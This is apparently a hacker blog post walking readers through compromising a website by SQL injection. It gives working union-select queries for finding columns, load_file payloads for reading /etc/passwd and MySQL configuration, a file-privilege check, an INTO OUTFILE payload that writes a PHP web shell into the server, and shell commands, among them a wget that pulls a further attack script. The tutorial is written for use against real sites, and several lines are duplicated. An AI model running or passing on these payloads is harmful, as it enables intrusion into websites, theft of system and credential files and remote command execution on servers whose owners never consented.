Guyz , This is a laxu here ! So For Starting
the Progress , first of all find a website which is vulnerable to sql
injection. You can find websites by dorks or manually Depends On your
Capability !
- Root Path of the website
- A Writable Directory
Most of the time, you will see root path in SQL error of that site.Like the following one : Example
” Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in/home/hruday/public_html/functions.php on the line 1327 “
But , If the vulnerable website doesn’t show the root path then
don’t worry i will show you how to know the root path. And Also Writable
Directory. :
” www.site.com/index.php?id=10′ “
I am not starting with abc of SQLI I hope u know the basics ,
Now we have to found columns of the website then vulnerable columns like my site have 5 columns And 3 is the vulnerable column ,
Now we have to found columns of the website then vulnerable columns like my site have 5 columns And 3 is the vulnerable column ,
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,4,5–
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,version(),4,5–
Let’s Try To Load Files Of The Website : - www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file(‘/etc/passwd’),4,5–
- www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file(‘/etc/my.cnf’),4,5–
- www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file(‘/etc/group’),4,5–
- www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file(‘/etc/services’),4,5–
- www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file(‘/etc/hosts’),4,5–
We Won’t Need To Read Any Files Mentioned above just to increase
your knowledge. Now we have to check the file privileges for the current
user for this first you have to find current username.
Like This :
Like This :
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,current_user,4,5–
Our Current Username is etc mine is HrudayCharan ;
Now Check File Privilages for User HrudayCharan ;
Now Check File Privilages for User HrudayCharan ;
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,file_priv,4,5 FROM mysql.user WHERE user=’HrudayCharan’–
If it shows Y (yes) on the vulnerable column of the website , that means we have the file privileges for the current user HrudayCharan
And if it doesn’t show Y then Don’t waste your time there
Ok Now we need to know the root path for this webserver. So, for
this information we need to know the webserver type.For this you can use
firefox adon server spy.
” Server Spy Adon: https://addons.mozilla.org/en-us/firefox/addon/server-spy/ “
You can use havij and some other tool too to detect webserver type.To know the webserver by file /etc/passwd use this query
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,load_file(‘/etc/passwd’),5–
now we have our webserver etc (/home/Hruday) :
now read one more file.
now read one more file.
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file(‘etc/HrudayCharan.conf’)4,5–
Where HrudayCharan is your webserver soft name like server name.conf .
now we have Obtained the root path
now we have Obtained the root path
/home/site.com/public_html etc.
Now we have to find a writeable directory for this you can use google dorks as well and your knowledge too
site www.site.com/dir/*/*/*/*/
so its site.com/Hruday is writeable
now we will upload our evil code
now we will upload our evil code
” www.site.com/index.php?id=10 UniOn SeleCt 1,2,”<?system($_REQUEST[‘cmd’]);?>”,4,5 into outfile ‘/home/site/public_html/Hruday/’WRITABLE_DIRECTORY’/hny.php’–+ “
ok now we have to execute our commands :
” www.site.com/writeable_directory/hny.php?cmd=pwd ” OR
” COMMANDS YOU BASICALLY USE IN LINUX “
Now we will use wget command to upload our evil script : 3:) The Evil Attempt
” www.site.com/writeable_directory/hny.php?cmd=wget http://site.com/honey.txt -O honey.php”
Now Open it . You Got Ready ! GoHere : www.site.com/WRITABLE_directory/honey.php And eNjoy The Shell Thanks and Stay Updated To The Blog .
./signing off